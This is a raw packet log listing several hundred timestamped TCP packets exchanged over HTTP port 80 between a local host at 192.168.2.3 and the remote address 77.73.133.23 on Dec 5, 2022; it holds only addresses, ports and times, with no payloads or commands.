Dec 5, 2022 01:32:57.104120016 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104139090 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104149103 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104180098 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104192019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104221106 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104234934 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104263067 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104274988 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104305983 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104315996 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104346037 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104357004 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104387045 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104428053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104455948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104455948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104468107 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104486942 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104507923 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104522943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104548931 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104573011 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104588985 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104612112 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104631901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104657888 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104671955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104681969 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104713917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104727983 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104753971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104770899 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104796886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104819059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104837894 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104865074 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104877949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104891062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104919910 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104935884 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.104963064 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.104974985 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105001926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105017900 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105042934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105063915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105083942 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105099916 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105123997 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105140924 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105165005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105180025 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105205059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105214119 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105246067 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105268002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105288029 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105298042 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105328083 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105345011 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105369091 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105379105 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105410099 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105433941 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105449915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105458975 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105490923 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105505943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105531931 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105547905 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105571985 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105590105 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105613947 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105628014 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105654001 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105664968 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105695009 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105709076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105736017 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105752945 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105779886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105797052 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105820894 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105839968 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105861902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105880976 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105902910 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105926037 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105946064 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.105967045 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.105984926 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106010914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106025934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106053114 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106067896 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106085062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106108904 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106127977 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106148958 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106170893 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106189966 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106214046 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106230974 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106247902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106272936 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106285095 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106312990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106333017 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106353998 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106369019 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106395006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106411934 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106436014 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106453896 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106476068 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106497049 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106515884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106534958 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106558084 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106576920 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106600046 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106616974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106640100 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106658936 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106681108 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106699944 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106722116 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106744051 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106761932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106781960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106805086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106822014 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106844902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106864929 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106906891 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106914043 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106950045 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.106971979 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.106992006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107017040 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107032061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107055902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107073069 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107093096 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107114077 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107135057 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107156038 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107177973 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107197046 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107220888 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107237101 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107254982 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107279062 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107296944 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107321024 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107331038 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107362032 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107379913 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107402086 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107424021 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107443094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107461929 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107485056 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107502937 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107526064 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107544899 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107567072 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107584953 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107608080 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107626915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107649088 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107665062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107690096 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107707024 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107731104 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107750893 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107772112 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107791901 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107815027 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107832909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107856035 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107875109 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107896090 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107912064 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107937098 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.107955933 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.107979059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108000040 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108031988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108042002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108073950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108093023 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108114004 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108136892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108155012 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108190060 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108196020 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108213902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108237028 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108256102 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108278036 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108298063 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108320951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108335972 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108396053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108411074 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108438015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108453989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108479023 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108498096 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108519077 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108539104 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108560085 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108577967 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108601093 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108611107 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108643055 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108655930 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108685017 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108700037 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108725071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108741045 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108767033 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108784914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108813047 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108827114 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108853102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108869076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108894110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108910084 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108936071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108954906 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.108977079 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.108988047 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109019041 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109035015 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109059095 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109077930 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109100103 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109113932 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109142065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109155893 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109183073 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109198093 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109224081 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109240055 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109265089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109282970 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109306097 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109324932 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109348059 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109364986 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109389067 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109407902 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109430075 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109447956 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109471083 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109488010 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109510899 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109529972 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109565020 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109581947 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109606028 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109637022 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109647989 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109663010 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109689951 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109703064 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109730005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109746933 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109771967 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109788895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109816074 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109829903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109857082 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109873056 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109896898 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109914064 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109939098 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109956980 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.109978914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.109997034 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110019922 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110037088 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110060930 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110076904 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110102892 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110117912 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110145092 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110160112 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110187054 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110203981 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110228062 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110244989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110268116 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110286951 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110307932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110326052 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110347986 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110362053 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110389948 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110404968 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110431910 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110447884 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110474110 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110491037 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110515118 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110531092 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110570908 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110634089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110676050 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110697985 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110722065 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110739946 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110761881 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110778093 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110805035 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110825062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110853910 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110856056 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110910892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110915899 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110958099 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.110959053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.110997915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.111119986 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.111162901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.111177921 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.111205101 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.111623049 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.111661911 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.111682892 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.111702919 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.111709118 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.111747980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.111747980 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.111788988 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:57.111790895 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:57.111831903 CET	80	49707	77.73.133.23	192.168.2.3
